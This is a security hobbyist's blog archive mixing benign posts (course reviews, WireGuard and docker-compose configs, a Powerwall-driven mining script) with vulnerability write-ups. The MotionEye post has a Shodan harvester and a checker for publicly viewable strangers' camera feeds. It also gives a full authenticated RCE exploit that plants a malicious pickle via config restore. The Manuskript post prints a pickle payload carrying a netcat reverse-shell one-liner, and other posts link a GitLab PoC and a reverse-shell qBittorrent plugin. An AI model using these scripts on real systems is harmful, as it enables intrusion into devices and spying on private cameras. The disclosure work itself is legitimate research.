Category Archives: blog

Offensive Security PEN-300 Evasion Techniques and Breaching Defenses – Course and Exam Review

You know, OffSec describes the OSEP as: “Evasion Techniques and Breaching Defenses (PEN-300) is an advanced penetration testing course”. I don’t know how advanced it is, if I can pass, lol. I generally have no idea what I’m doing.

Anyway, I really liked the course. There is a lot of material to keep you busy. Unless you’re already familiar with a large chunk of the topics, you’re probably best-served by purchasing the 90 day version of the course. The challenge labs are fun. Make sure you do them before the exam.

The exam was challenging, but fair. You should be able to figure out what you need to do next somewhat quickly, but executing it may be a different story, if you’re anything like me. Just ask yourself, “What did I just accomplish, and what does that allow me to do now?” If you’ve completed the challenge labs, you will be well-prepared for the exam. Some people say to make sure you do all the questions and extra miles in the lab manual, but I only did, I don’t know, 30% of them?

I don’t know what’s next for me. I have a voucher to do the OSED, but I’m a little burned out at this point. I’ll probably put that off until the summer – because who doesn’t like sitting inside and writing exploits when the weather is nice?

Do More with Tree (and why you should read the docs)

If you aren’t familiar with the Tree command in Linux, you should be. You can read about it here. Tree has been around for what seems like forever, and I’ve been using it for as long as I’ve been using Linux. With that said, I didn’t really know all that much about it until recently. The extent of my usage has always been something like this: $ tree -L 3 and that’s it.

Like most other Linux tools, there is much more to Tree than what I know. Take a look at the following command:

$ tree -LpDugC 2 -H .  > index.html 

This will create an index.html file that has a listing of everything in the dir in HTML form.

Anyway, you can install tree on Linux, Mac, and even Windows. There really wasn’t a huge point to this post — it’s just a reminder that your tools can do a lot more than what you’re probably already using them for. It pays to read the documentation.

Learning Go By Writing a POC for Gitlab CVE-2021-22205

I’ve been wanting to learn Go, and I learn by doing, so I decided to write a POC for CVE-2021-22205, which is fairly straightforward RCE in Gitlab that dropped a few weeks ago. My process in developing this went like this.

  1. Do thirty seconds of research to find a prior Golang POC for this CVE. I didn’t find one, but I’m sure they exist somewhere. I still would have written this, even if I found one. It would make for something to compare my poorly written code to.
  2. Start writing code. My thoughts the whole time while I was writing this were some variation of the following, “There must be a better way to do this.”
  3. Test.
  4. Rewrite.
  5. Repeat above for about 6 hours.
  6. Success!

I’m going to need more practice. I’ve been so used to python for the last ten years, moving to Golang is going to take some work.

Anyway, here is a link to my POC.

Tesla Solar, Powerwalls, Docker, Python, and Crypto Mining

I had Tesla solar panels and Powerwalls installed several weeks ago. I currently don’t have permission to operate (PTO) from my electricity provider, which means I can’t ship any of my surplus power back to the grid. So, after my batteries fill up for the day, I usually have power production that is going to waste. What can I do with that power?

Mine crypto, that’s what I can do! Those of you that know me IRL, know that I’ve been involved in crypto for a decade. Mining isn’t new to me, but I mostly gave up on it in 2012/2013 when I was only mining a few of Bitcoin a month and it wasn’t worth it to me anymore. Talk about a wrong decision…

I digress. I’m sitting here now producing extra power. Mining crypto with a graphics card that I already have will make me around $50-100/month and give me a chance to whip up a script in Python, which is what I truly enjoy in life. I haven’t done the actual math on it, but I think mining crypto is more profitable that selling my power back to my utility provider. It is also more fun to mine, lol.

My workstation that I’ll be mining on has a sole Gigabyte 1080 TI. It’s a little old, but they’re still going for $700 on eBay these days. I’m running Ubuntu 20.04, and I’ve decided to mine with a docker container and pointing my card at an ethash endpoint from NiceHash. I need to do some research to see if there are better options – which I assume exist.

My overall strategy for this operation will be pretty simple to start off. I’m just going to mine when my batteries are charged above a certain threshold. I set this threshold in the variable BATTERY_CHARGE_TO_START_MINING in the code. Yeah, I like long variable names.

Fortunately, Tesla provides an API to gather information from the Powerwall and there is a Python package to query it. To install this package use the following command:

pip3 install tesla_powerwall

And since I use this docker image to run the Trex Miner app, we also need to install the docker python package.

pip3 install docker

This script is pretty straightforward. I start a docker client to get the running images. I create a new Miner class with my wallet address and URL. This class has methods to start and stop the miner, as well as check if it is running.

Then, in a while loop I check my battery level and start and stop the miner as appropriate. I repeat this every HOW_OFTEN_TO_CHECK seconds.

Here is the code:

#!/usr/bin/env python3

import os
from tesla_powerwall import Powerwall
import docker
import time

POWERWALL_URL = ""  # PowerWall Gateway address goes here
EMAIL = ""  # email address that you use to login into the gateway
PASSWD = ""  # password that you use to log into the gateway
WALLET_ADDRESS = "35kwhvhyfnVnGdoWdyLqrtaHeY7RYByPfW"  # mining wallet address
MINING_URL = (
    "stratum+tcp://daggerhashimoto.usa-east.nicehash.com:3353"  # Mining url
)
# lowest battery charge where mining will start
BATTERY_CHARGE_TO_START_MINING = 50
# how often to check is battery level allows mining or not in seconds
HOW_OFTEN_TO_CHECK = 1800


def init():
    # initialize powerwall object and api
    powerwall = Powerwall(
        endpoint=POWERWALL_URL,
        timeout=10,
        http_session=None,
        verify_ssl=False,
        disable_insecure_warning=True,
        pin_version=None,
    )
    powerwall.login(PASSWD, EMAIL)

    api = powerwall.get_api()

    return powerwall, api


class Miner:
    def __init__(self, client, wallet_address, mining_url):

        self.wallet_address = wallet_address
        self.mining_url = mining_url
        self.client = client
        return

    def start_miner(self, client):
        env_vars = {
            "WALLET": WALLET_ADDRESS,
            "SERVER": MINING_URL,
            "WORKER": "Rig",
            "ALGO": "ethash",
        }
        try:
            client.containers.run(
                "ptrfrll/nv-docker-trex:cuda11",
                detach=True,
                runtime="nvidia",
                name="trex-miner",
                ports={4067: 4067},
                environment=env_vars,
            )
        except os.error as e:
            client.containers.get("trex-miner").restart()
        return

    def stop_miner(self, client):
        trex = client.containers.get("trex-miner")
        trex.stop()
        return

    def is_running(self):
        try:
            client.containers.get("trex-miner")
            return True
        except os.error:
            return False


if __name__ == "__main__":
    powerwall, api = init()

    client = docker.from_env()

    miner = Miner(client, WALLET_ADDRESS, MINING_URL)

    miner.start_miner(client)

    while True:
        # powerwall charge is satisfactory, start mining
        if not miner.is_running() and (
            api.get_system_status_soe()["percentage"]
            > BATTERY_CHARGE_TO_START_MINING
        ):
            miner.start_miner(client)
            print("miner is running or will be started")
        # powerwall charge is too low, shut off mining
        elif miner.is_running() and (
            api.get_system_status_soe()["percentage"]
            < BATTERY_CHARGE_TO_START_MINING
        ):
            print("stopping miner")
            miner.stop_miner(client)
        # try again
        time.sleep(HOW_OFTEN_TO_CHECK)

You can also find future updates of the code here.

TODO: add more options to start/stop mining e.g. if my panels/batteries are connected to the grid or not, start/stop mining based on the weather, etc.

TODO: rewrite in Golang. Trying to learn Go.

Hacking MotionEye/MotionEyeOS

Getting Started with MotionEye

MotionEye is an open source, web-based GUI for the popular Motion CLI application found on Linux. I’ve known of the Motion command line app for years, but I didn’t know that MotionEye existed. I ran across it while trying to find a multiple webcam, GUI or web based solution for future projects.

MotionEye comes in a couple forms – a standalone app, which I used the docker container version of, or a “whole” operating system, MotionEyeOS, to install on a Raspberry Pi.

Starting off, I used Shodan search to find internet facing installations. Here is the script I used for that. If you use this script, you’ll need to put in your API key and the limit parameter, which limits the API queries that you use.

#!/usr/bin/env python3

import sys
# pip3 install shodan
from shodan import Shodan
import requests

# check for api key
api = Shodan('') # Insert API key here

if api.api_key == '':
    print("No API key found! Exiting")
    sys.exit(1)

limit = 1000 # set this to limit your api query usage
counter = 0

url_file = open("urls.txt", "w")

for response in api.search_cursor('Server: motionEye'):
    ip = response['ip_str']
    port = response['port']
    url = f'http://{ip}:{port}'
    url_file.write(url + '\n')

    # Keep track of how many results have been downloaded so we don't use up all our query credits
    counter += 1
    if counter >= limit:
        break

url_file.close()

I ran out of query credits when I ran this script. There are thousands of installations out there. This script will output the IP addresses of those installations.

Finding Live Feeds

In my review of the application, I found that you can make a query to the /picture/{camera-number}/current/ endpoint, and if it returns a 200 status code, it means that the feed is open to the public. You can also increment the camera-number an enumerate the numbers of cameras a feed will actually have, even if it isn’t available to view.

I took the output of motioneye-shodan.py script above, and fed it to live-feeds.py script below.

#!/usr/bin/env python3

import requests

url_file = open("urls.txt", "r")
urls = url_file.readlines()
url_file.close()

live_urls = open("live-urls.txt", "w")

for url in urls:
    try:
        response = requests.get(url + "/picture/0/current/", verify=False, timeout=3).status_code
        print(response)
        if response == 200:
            live_urls.write(url)
    except:
        pass

live_urls.close()

This script outputs the URL of camera feeds that we can view. But the real question here is, what security issues are there with MotionEye?

Information Leakage

It turns out that if you make a get request to the following endpoint /config/list, some of the feeds will return their config files. Most of the time these config files are innocuous. I’m not sure why these are publicly accessible even if the feed is publicly accessible. Maybe it is used as an API endpoint of some sort. I need to dig into the code some more.

However, sometimes these config files contain some very sensitive information. Consider the following config with email_notifications_smtp_password and email_notifications_addresses removed. These passwords are supposed to be for services that the public cannot access, but unfortunately people like to reuse passwords. Again, why is this file even readable?

Along with the occasional password, email addresses are in here, internal IP addresses and ports, mounting points for local drives, etc.

Rate-Limiting and Default Credentials

So, the default installation of MotionEye uses the username of admin and a blank password. Additionally, MotionEye does not seem to institute any sort of rate limiting on login attempts. This is a recipe for disaster.

Authenticated RCE Method #1

Once logged in, I found two simple methods of code execution. The first of which is a classic Python cPickle deserialization exploit.

In the configuration section of the application, there is an option to backup and restore the application configurations. It turns out that if you include a malicious tasks.pickle file in the config you are restoring with, it’ll be written to disk and will be loaded when the application is restarted automatically or manually.

You can simply download the current configuration to use it as a template. After downloading and extracting it, slide your malicious tasks.pickle file and tar.gz everything back up.

The final structure of my motioneye-config.tar.gz for the docker container is as follows:

β”œβ”€β”€ camera-1.conf
β”œβ”€β”€ motion.conf
β”œβ”€β”€ motioneye.conf
└── tasks.pickle

Alternatively, the final structure of my motioneye-config.tar.gz lon MotionEyeOS is the following:

β”œβ”€β”€ adjtime
β”œβ”€β”€ camera-1.conf
β”œβ”€β”€ crontabs
β”œβ”€β”€ date.conf
β”œβ”€β”€ localtime -> /usr/share/zoneinfo/UTC
β”œβ”€β”€ motion.conf
β”œβ”€β”€ motioneye.conf
β”œβ”€β”€ ntp.conf
β”œβ”€β”€ os.conf
β”œβ”€β”€ proftpd.conf
β”œβ”€β”€ shadow
β”œβ”€β”€ shadow-
β”œβ”€β”€ smb.conf
β”œβ”€β”€ ssh
β”‚   β”œβ”€β”€ ssh_host_dsa_key
β”‚   β”œβ”€β”€ ssh_host_dsa_key.pub
β”‚   β”œβ”€β”€ ssh_host_ecdsa_key
β”‚   β”œβ”€β”€ ssh_host_ecdsa_key.pub
β”‚   β”œβ”€β”€ ssh_host_ed25519_key
β”‚   β”œβ”€β”€ ssh_host_ed25519_key.pub
β”‚   β”œβ”€β”€ ssh_host_rsa_key
β”‚   └── ssh_host_rsa_key.pub
β”œβ”€β”€ static_ip.conf
β”œβ”€β”€ tasks.pickle
β”œβ”€β”€ version
β”œβ”€β”€ watch.conf
└── wpa_supplicant.conf

Pause here: You see, those are ssh keys. So you say why don’t we just try ssh? Go for it. You also may not even need a password, but some people have either secured ssh or disabled ssh on the actually raspberry pi, so it won’t work. A lot of these instances will have ssh turned off, and if it is running in docker, you probably won’t be able to download the ssh keys. Also, it is more fun to write scripts in Python.

Once the configuration is uploaded, wait for the app to reload, or, in unfortunate cases, wait for the app to be reloaded by mother nature or the victim. From what I can see, the docker application will not autoreboot. Here is a Python 3 script that will do all of this. Also, see the github repo, which may be more updated.

#!/usr/bin/env python3

import requests
import argparse
import os
import pickle
import hashlib
import tarfile
import time
import string
import random
from requests_toolbelt import MultipartEncoder
import json


# proxies = {"http": "http://127.0.0.1:9090", "https": "http://127.0.0.1:9090"}
proxies = {}


def get_cli_args():
    parser = argparse.ArgumentParser(description="MotionEye Authenticated RCE Exploit")
    parser.add_argument(
        "--victim",
        help="Victim url in format ip:port, or just ip if port 80",
        required=True,
    )
    parser.add_argument("--attacker", help="ipaddress:port of attacker", required=True)
    parser.add_argument(
        "--username", help="username of web interface, default=admin", default="admin"
    )
    parser.add_argument(
        "--password", help="password of web interface, default=blank", default=""
    )
    args = parser.parse_args()
    return args


def login(username, password, victim_url):
    session = requests.Session()
    useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
    headers = {"User-Agent": useragent}
    login_url = f"http://{victim_url}/login/"
    body = f"username={username}&password={password}"
    session.post(login_url, headers=headers, data=body)
    return session


def download_config(username, victim_url, session):
    download_url = f"http://{victim_url}/config/backup/?_username={username}&_signature=5907c8158417212fbef26936d3e5d8a04178b46f"
    backup_file = session.get(download_url)
    open("motioneye-config.tar.gz", "wb").write(backup_file.content)
    return


def create_pickle(ip_address, port):
    shellcode = ""  # put your shellcode here

    class EvilPickle(object):
        def __reduce__(self):
            cmd = shellcode
            return os.system, (cmd,)

    # need protocol=2 and fix_imports=True for python2 compatibility
    pickle_data = pickle.dumps(EvilPickle(), protocol=2, fix_imports=True)
    with open("tasks.pickle", "wb") as file:
        file.write(pickle_data)
        file.close()
    return


def decompress_add_file_recompress():
    with tarfile.open("./motioneye-config.tar.gz") as original_backup:
        original_backup.extractall("./motioneye-config")
        original_backup.close()
    original_backup.close()
    os.remove("./motioneye-config.tar.gz")
    # move malicious tasks.pickle into the extracted directory and then tar and gz it back up
    os.rename("./tasks.pickle", "./motioneye-config/tasks.pickle")
    with tarfile.open("./motioneye-config.tar.gz", "w:gz") as config_tar:
        config_tar.add("./motioneye-config/", arcname=".")
    config_tar.close()
    return


def restore_config(username, password, victim_url, session):
    # a lot of this is not necessary, but makes for good tradecraft
    # recreated 'normal' requests as closely as I could
    t = int(time.time() * 1000)
    path = f"/config/restore/?_={t}&_username={username}"
    # admin_hash is the sha1 hash of the admin's password, which is '' in the default case
    admin_hash = hashlib.sha1(password.encode("utf-8")).hexdigest().lower()
    signature = (
        hashlib.sha1(f"POST:{path}::{admin_hash}".encode("utf-8")).hexdigest().lower()
    )
    restore_url = f"http://{victim_url}/config/restore/?_={t}&_username=admin&_signature={signature}"

    # motioneye checks for "---" as a form boundary. Python Requests only prepends "--"
    # so we have to manually create this
    files = {
        "files": (
            "motioneye-config.tar.gz",
            open("motioneye-config.tar.gz", "rb"),
            "application/gzip",
        )
    }

    useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
    boundary = "----WebKitFormBoundary" + "".join(
        random.sample(string.ascii_letters + string.digits, 16)
    )

    m = MultipartEncoder(fields=files, boundary=boundary)
    headers = {
        "Content-Type": m.content_type,
        "User-Agent": useragent,
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": "meye_username=_; monitor_info_1=; motion_detected_1=false; capture_fps_1=5.6",
        "Origin": f"http://{victim_url}",
        "Referer": f"http://{victim_url}",
        "Accept-Language": "en-US,en;q=0.9",
    }
    response = session.post(restore_url, data=m, headers=headers, proxies=proxies)
    # if response == reboot false then we need reboot routine
    content = json.loads(response.content.decode("utf-8"))

    if content["reboot"] == True:
        print("Rebooting! Stand by for shell!")
    else:
        print("Manual reboot needed!")
    return


if __name__ == "__main__":
    print("Running exploit!")
    arguments = get_cli_args()
    session = login(arguments.username, arguments.password, arguments.victim)
    download_config(arguments.username, arguments.victim, session)
    # sends attacker ip and port as arguments to create the pickle
    create_pickle(arguments.attacker.split(":")[0], arguments.attacker.split(":")[1])
    decompress_add_file_recompress()
    restore_config(arguments.username, arguments.password, arguments.victim, session)

Authenticated RCE Method #2

Another method of code execution involves motion detection. There is an option to run a system command whenever motion is detected. The security implications of this are obvious.

python rev shell

Conclusion

While authentication is needed for RCE, the presence of default credentials and lack of rate limiting make obtaining authentication straightforward. There are a lot of people running this software in a vulnerable manner.

As per my usual advice, don’t expose MotionEye to the WWW. Like all the self-hosted solutions, I advise you to install this to face your internal network and then connect to your internal network via OpenVPN or Wireguard.

Update: I was give CVE-2021-44255 for the python pickle exploit.

Wireguard to Your House

Instructions:

  • Run Wireguard on your home server and select a port that you’d like to face externally.
  • Port forward that port in your router to your server. Let’s use port 12345.
  • Create public and private keys on your server.
  • Create conf file on your server.
  • Create keys and conf file on clients (phone, notebook, tablet, etc).
  • Enter keys in conf files.
  • Connect clients to home server.

Here is a sample which has confs for both a server and client. Ensure you enter your information as needed. Don’t forget your interface in the iptables commands.

# home server wg0.conf

[Interface]
PrivateKey = # server privkey here 
Address = 192.168.2.1
ListenPort = 12345

PostUp   = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp0s31f6 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp0s31f6 -j MASQUERADE

[Peer]
# notebook
PublicKey = # notebook pubkey here
AllowedIPs = 192.168.2.2

# notebook wg0.conf

[Interface]
PrivateKey = # notebook privkey here
Address = 192.168.2.3
DNS = 192.168.1.125 # dns server (pihole) address on my home network

[Peer]
PublicKey = # server pubkey here
Endpoint = 1.2.3.4:12345 # your home ip address and wireguard port
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 21

So, in this case, port 12345 should be setup for port forwarding. You clients will connect back to port 12345 on your home IP address. If you have a dynamic IP address at home, you’ll need a solution for that like a custom script, DDNS, or even using a VPS as some sort of jump host.

If you can’t open a port, you could run the server on a Linode (with my referral of course, lol) instance that would be very cheap. A nanode is $5 a month, and now you can use it for other stuff too. Then connect everything to it. Now your phone and home server are on the same network.

Docker Compose – Plex with Plex Pass, Jackett, Sonarr, Radarr, Lidarr, qBittorrent, and PIA

Update: Now with prowlarr, too.

This docker-compose-yml file will run all of these services. This post assumes that you have a little technical knowledge already and that you have Docker and Docker Compose installed. This will run all the downloading with qBittorrent and encrypted over PIA VPN.

Here is the directory structure that this compose file needs.

Β /home
└── user
Β Β Β β”œβ”€β”€ data
Β Β Β β”‚Β Β Β β”œβ”€β”€ movies
Β Β Β β”‚Β Β Β β”œβ”€β”€ music
   │   └── television
   └── data2
Β Β Β Β Β Β Β β”œβ”€β”€ config
Β Β Β Β Β Β Β β”œβ”€β”€ data
Β Β Β Β Β Β Β β”œβ”€β”€ jackett
Β Β Β Β Β Β Β β”œβ”€β”€ lidarr
Β Β Β Β Β Β Β β”œβ”€β”€ radarr
       └── sonarr
       └── prowlarr
/var
└── docker
   └── plex
Β Β Β Β Β Β Β β”œβ”€β”€ config
       └── transcode

You’ll need to update the docker-compose file with your username. My username is user, so that is what you see in the structure above.

You can make these directories and set permissions with the following commands on Linux.

mkdir -p /home/$USER/data/{movies,music,television}
mkdir -p /home/$USER/data2/{config,data,jackett,lidarr,radarr,sonarr,prowlarr}
sudo mkdir -p /var/docker/plex/{config,transcode}
sudo chown $USER:$USER /var/docker/plex/{config,transcode}

In the docker-compose file, you’ll need to enter your PIA username and password. The Plex service is set up for Plex Pass usage, so you’ll need to enter your plex claim. Once everything is rolling, you’ll need to update path mappings in Sonarr, Radarr, and Lidarr. You do this in settings > download clients in each application.

You also need to setup the downloaders in Sonarr, Radarr, and Lidarr. You can do this through settings > download clients and then click the big plus button to add a client. If you’re not using SSL for your qBittorrent instance, you won’t need to check that box. The same goes for the password protection. If you’re looking to use SSL, you can check out this post of mine.

Now you need to set up Jackett with your indexers. This will be different for everybody, so follow the instructions that are widely available.

As promised, here is the docker-compose.yml file. You may need to change your UID/GID to what is applicable to your installation/user. Please read it thoroughly – especially the comments. There are things you will need to change.

version: '3.8'
services:
    
    pms-docker:
        container_name: plex
        network_mode: host
        hostname: plex
        runtime: nvidia
        environment:
            - TZ=America/New_York
            - PLEX_UID=1000
            - PLEX_GID=1000
            - PLEX_CLAIM=<your claim here> 
            - ADVERTISE_IP= #ip:port here e.g. http://127.0.0.1:32400
            - NVIDIA_VISIBLE_DEVICES=GPU-04aeacae-0ae1-25b6-1504-a4bec4ed2da9 #change as needed
            - NVIDIA_DRIVER_CAPABILITIES=compute,video,utility
        volumes:
            - /var/docker/plex/config:/config
            - /var/docker/plex/transcode:/transcode
            - /home/user/data/television:/data/tvshows
            - /home/user/data/movies:/data/movies
            - /home/user/data/music:/data/music
        restart: unless-stopped
        devices:
            - /dev/dri/card0:/dev/dri/card0 #your devices go here
            - /dev/dri/renderD128:/dev/dri/renderD128 #may be different
        image: plexinc/pms-docker:plexpass
    
    arch-qbittorrentvpn:
        container_name: qbittorrentvpn
        hostname: qbittorrentvpn
        cap_add: 
            - NET_ADMIN
        ports:
            - '6881:6881'
            - '6881:6881/udp'
            - '6969:6969'
            - '8118:8118'
        container_name: qbittorrentvpn
        restart: unless-stopped
        volumes:
            - '/home/user/data2/data:/data'
            - '/home/user/data2/config:/config'
            - '/etc/localtime:/etc/localtime:ro'
        environment:
            - VPN_ENABLED=yes
            - VPN_USER= #put your PIA username here
            - VPN_PASS= #put your PIA password here
            - VPN_PROV=pia
            - VPN_CLIENT=openvpn
            - STRICT_PORT_FORWARD=yes
            - ENABLE_PRIVOXY=yes
            - LAN_NETWORK=192.168.1.0/24 #possibly different
            - 'NAME_SERVERS=209.222.18.222,84.200.69.80,37.235.1.174,1.1.1.1,209.222.18.218,37.235.1.177,84.200.70.40,1.0.0.1'
            - VPN_INPUT_PORTS=1234
            - VPN_OUTPUT_PORTS=5678
            - DEBUG=false
            - WEBUI_PORT=6969 #not the default change in webui
            - UMASK=000
            - PUID=1000
            - PGID=1000
        sysctls:
            - net.ipv6.conf.all.disable_ipv6=1
        image: binhex/arch-qbittorrentvpn

    jackett:
        image: ghcr.io/linuxserver/jackett
        container_name: jackett
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
            - AUTO_UPDATE=true 
            - RUN_OPTS=<run options here>
        volumes:
            - /home/user/data2/jackett/config:/config
            - /home/user/data2/data:/downloads
        network_mode: host #9117
        restart: unless-stopped
    
    radarr:
        image: ghcr.io/linuxserver/radarr
        container_name: radarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        volumes:
            - /home/user/data2/radarr:/config
            - /home/user/data/movies:/movies
            - /home/user/data2/data:/downloads
        network_mode: host #7878
        restart: unless-stopped

    sonarr:
        image: ghcr.io/linuxserver/sonarr
        container_name: sonarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        volumes:
            - /home/user/data2/sonarr:/config
            - /home/user/data/television:/tv
            - /home/user/data2/data:/downloads
        network_mode: host #8989
        restart: unless-stopped

    lidarr:
        image: ghcr.io/linuxserver/lidarr
        container_name: lidarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        volumes:
            - /home/user/data2/lidarr:/config
            - /home/user/data/music:/music 
            - /home/user/data2/data:/downloads 
        network_mode: host #8686:8686
        restart: unless-stopped
  
prowlarr:
    image: lscr.io/linuxserver/prowlarr:develop
    container_name: prowlarr
    environment:
      - PUID=1000
      - PGID=1000
      - TZ=America/New_York
    # put your directories here
    volumes:
      - /home/user/data2/prowlarr:/config
    network_mode: host #9696
    restart: unless-stopped

Now you should be able to cd into the directory that contains this docker compose file, and then run

sudo docker compose up

# or the following, so output isn't printed to screen

sudo docker compose up -d  

This post should point you in the right direction, at least. I’m not responsible for any errors. Things may have been updated since I wrote this post. Special thanks to linuxserver.io and binhex for the images.

Advanced Web Attacks and Exploits -AWAE – Exam Review

> AWAE Course Overview

For people unfamiliar with this course and exam, here is a link to the Offensive security website. I’ve also written about it before, so you can check my post history. Basically the course is a giant pdf and a bunch of videos that go over web application attacks. You then get access to a lab consisting of 13 machines that are running a wide variety of vulnerable web-apps. In regards to languages/DBs/tech, this course covers VSCode, Visual Studio, JDGui, Javascript, PHP, Node, Python, Java, C#, mysql, and postgres – so it’s pretty thorough.

The exam is a 48 hour long exam where they give you access to two machines running vulnerable web-apps. You have to bypass auth on them to get administrator access and then escalate your attack to full-blown remote code execution. You’ll get two debugging machines that are running the same apps as the exam machines. You get full access to the app source code – this is a white-box course after all. You have to review the code base, and then use these debugging machines to develop ‘one-shot’ exploit script that bypasses auth and trigger RCE. I used python, as do most people, I think.

Oh yeah, and they watch you on camera the whole time.

After the exam time is up, assuming you have enough points to pass, you have another 24 hours to write an exam report documenting what you found and how you exploited it.

> How did it go?

First things first: I had to take this one twice. My power went out twice, briefly, and my father had to go to the hospital (he’s fine) during my first attempt. Even though he lives hours away, and there wasn’t much I could do, I was a little distracted. And it wasn’t like I was in front of the computer for the full 48 hours. I took a break about every 1.5 hours or so and slept 5-6 hours both nights.

Nevertheless, I still managed RCE on one of the boxes, and if I had another hour or so, I would have had an auth bypass on the second box – which would likely have let me pass. I look back and I just kind of laugh at how I failed it. I missed something simple that would have given me enough points to pass. I even knew what I needed – I just overlooked it.

I actually noticed the vulns on both boxes within an hour of looking at them. I then went down some rabbit holes for a bit and got sidetracked – especially on the box that I considered the harder one.

The second time around I crushed the exam in about 8 hours – RCE on both boxes. I had my report turned in at the 20 hour mark or so – and I was lollygagging.

If you don’t know me, my background is this: I’m not a professional developer. I don’t work in IT. I have never worked in IT. I just like computers. If I can pass this exam, so can you.

> Advice and Review

My advice for people that are preparing to take this exam is to just take their time and read the code. You need to know how to get the VSCode debugging going. It is a lifesaver. It is probably hard to pass if you don’t get it working. If you follow the code flow in a debugger, things should pop out at you. With that said, they do throw in a couple curve balls, which I bet throws some people for a loop. Now these curve balls aren’t hard to hit, per se, but someone that hasn’t been in the infosec/CTF/bug bounty world may miss these things.

Another question that I’ve been asked is, “Do you need an OSCP to do this couse?” I’ve changed my mind on this several times, and while I think an OSCP will give you a leg up, you don’t really need to have one – especially if you’re already involved the hacking/bug bounty/CTF world. If you’re coming at it straight from being a developer, it may not hurt to expose yourself to this stuff beforehand.

All in all, I’d say the exam was fair and maybe a little on the easy side. I say that as someone that failed it once, too, haha. But not only that, the exam is also a lot of fun. I love the Offensive Security exams. Some people will probably hate me for saying that, but they are a lot of fun.

Malicious qBittorrent Search Plugin: Feature or Bug?

TLDR: Read the code before you install random qbittorent plug-ins.

qBittorrent has a feature that allows you to install a search plugin to search for torrents on your favorite sites. These plugins are written in Python, and although I haven’t reviewed the qBittorrent source code, it appears as if you can simply execute arbitrary code via these plugins. qBittorrent does not seem to do any sort of sanitization.

I added a reverse shell class to an already existing search plugin. The shell should work on Windows and Linux. Although, qBittorrent seems to have some issues with what version of Python you are using. Nevertheless, be aware that unsanitized code can be ran via the search plugin feature.

Here is a link to the malicious qBittorrent search plugin.

Arbitrary Code Execution in Manuskript < 0.12

Edit: A pull request has been submitted to remove this functionality and to depricate the old pickled settings, which is a wise security decision.

Edit: This vulnerability has been assigned CVE-2021-35196. It’s currently listed as disputed, even though it is definitely a vulnerability.

I was searching for an alternative to Scrivener to write my future nobel prize winning novel and ran across Manuskript. It looked promising. I found out that it was open-source and on github – which is always cool.

I decided to clone it and take a look at it. It’s written in Python, so that is good for me. It’s probably the language I’m most comfortable in these days.

I started checking out the code and I immediately noticed that pickle was imported in settings.py. The first thing that should come to mind to any security researcher worth their salt is insecure deserialization via the pickle.loads() and pickle.load() functions.

Sure enough, in settings.py, I noticed on lines 190 and 191, it looks like the program’s settings are loaded via pickle.loads() and pickle.load(), respectively. Now, I just had to figure out how to get to that point in the code.

It turns out that this wasn’t overly tough and it would simply involve loading a project that contains a malicious settings.pickle file. In loadSave.py, the function loadProject() on line 30 is responsible for doing exactly what you think it is supposed to do. You will notice in this function that it checks to see if the project is a zip file, but the project does not have to be a zip file.

I used a zip file in my exploit because that would probably be what is used in a realistic exploitation scenario. e.g. I send a malicious project to a co-writer, editor, publisher, etc. or I post a sample project of some sort online for others to use.

After the function determines if the project is a zip file or not, it checks the version of the project. This is where you need to do a small amount of work to exploit the insecure deserialization. It turns out that Manuskript has two versions of settings, version 0 and version 1. Version 0 is the one that uses the pickle module to deserialize the settings.

In order to force the program into the insecure deserialization, we just have to have a zip file without a MANUSKRIPT text file or a VERSION text file in the project and the project number will default to 0, which is what we want.

Now, onto the exploit. There are many references to insecure deserialization online, so google them if you aren’t familiar, but here is the code I used on Ubuntu 20.04 to generate a reverse shell to localhost port 1234. This payload can easily be modified to do anything you want it to do on Linux, Mac, and/or Windows. When this code is ran, it outputs a malicious settings.pickle file, which we will include in the project.

#!/usr/bin/env python3

import pickle
import os


class EvilPickle(object):
    def __reduce__(self):
       	cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
        return os.system, (cmd,)


pickle_data = pickle.dumps(EvilPickle())
with open("settings.pickle", "wb") as file:
    file.write(pickle_data)

After the settings.pickle file is output, simply zip it up:

zip malicious-project.zip settings.pickle

And now you have a malicious-project.zip file that you simply load into Manuskript.

I notified the people involved and they don’t have intentions to fix this issue. They are currently refactoring the project and the deserialization code may be removed altogether.